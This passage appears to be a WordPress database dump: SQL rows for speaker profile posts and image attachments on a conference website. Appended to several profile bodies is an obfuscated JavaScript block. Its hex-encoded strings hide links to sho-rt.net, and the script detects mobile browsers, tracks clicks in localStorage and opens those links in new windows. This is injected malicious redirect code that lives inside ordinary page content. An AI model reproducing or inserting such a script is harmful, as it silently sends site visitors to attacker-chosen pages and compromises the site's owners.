_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Hamdy Youssef','','publish','closed','closed','','prof-hamdy-youssef','','','2023-04-19 22:44:52','2023-04-19 22:44:52','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4075',0,'dt_team','',0),
(4076,1,'2023-04-19 22:42:50','2023-04-19 22:42:50','','dr hamdy','','inherit','open','closed','','dr-hamdy','','','2023-04-19 22:42:50','2023-04-19 22:42:50','',4075,'https://gsw2023.com/wp-content/uploads/2023/04/dr-hamdy.png',0,'attachment','image/png',0),
(4077,1,'2023-04-19 22:56:14','2023-04-19 22:56:14','<!-- wp:paragraph -->\n<p>Regional Director for Southern Africa Bureau</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4079,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-menghestab.png\" alt=\"\" class=\"wp-image-4079\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR.Menghestab Haile','','publish','closed','closed','','dr-menghestab-haile','','','2023-04-19 22:56:17','2023-04-19 22:56:17','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4077',0,'dt_team','',0),
(4078,1,'2023-04-19 22:53:22','2023-04-19 22:53:22','','dr-helal','','inherit','open','closed','','dr-helal','','','2023-04-19 22:53:22','2023-04-19 22:53:22','',4077,'https://gsw2023.com/wp-content/uploads/2023/04/dr-helal.png',0,'attachment','image/png',0),
(4079,1,'2023-04-19 22:54:27','2023-04-19 22:54:27','','dr-menghestab','','inherit','open','closed','','dr-menghestab','','','2023-04-19 22:54:27','2023-04-19 22:54:27','',4077,'https://gsw2023.com/wp-content/uploads/2023/04/dr-menghestab.png',0,'attachment','image/png',0),
(4080,1,'2023-04-19 22:55:43','2023-04-19 22:55:43','','dr menghestab2','','inherit','open','closed','','dr-menghestab2','','','2023-04-19 22:55:43','2023-04-19 22:55:43','',4077,'https://gsw2023.com/wp-content/uploads/2023/04/dr-menghestab2.png',0,'attachment','image/png',0),
(4081,1,'2023-04-19 23:06:07','2023-04-19 23:06:07','<!-- wp:paragraph -->\n<p>PhD: The Ohio State University, 2002.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dean of Postgraduate Affairs, AAST</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>Name and Affiliation:</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Yahya Z. Mohasseb is a with the Department of Computer Engineering, College of Engineering &amp; Technology, AAST-Heliopolis. Since joining AAST in early 2021, he was Dean of Education Affairs – AAST Cairo campuses, and he is currently Dean of Postgraduate Affairs. He previously served as Deputy Commandant of the Military Technical College, Cairo, Egypt.&nbsp; His academic research interests span physical layer communications &amp; security, network information theory, cross layer optimization, channel modeling &amp; estimation, and satellite communications architectures. Prof. Mohasseb was an active member in both the scientific and technical committees of EgyptSat-1, Egypt\'s earth observation and remote sensing satellite, and the technical program manager for Tiba-1, Egypt\'s first telecommunications satellite. He is a senior member of the IEEE and the recipient of the Medal of Distinguished Service and The Order of the Republic.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Yahya Z. Mohasseb','','publish','closed','closed','','prof-yahya-z-mohasseb','','','2023-04-19 23:06:10','2023-04-19 23:06:10','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4081',0,'dt_team','',0),
(4082,1,'2023-04-19 23:05:05','2023-04-19 23:05:05','','Yahya_Photo_Enhanced3','','inherit','open','closed','','yahya_photo_enhanced3','','','2023-04-19 23:05:05','2023-04-19 23:05:05','',4081,'https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png',0,'attachment','image/png',0),
(4083,1,'2023-04-19 23:13:55','2023-04-19 23:13:55','<!-- wp:image {\"id\":4084,\"width\":731,\"height\":587,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-yasser-fouad1.png\" alt=\"\" class=\"wp-image-4084\" width=\"731\" height=\"587\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":4085,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-yasser-fouad2.png\" alt=\"\" class=\"wp-image-4085\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 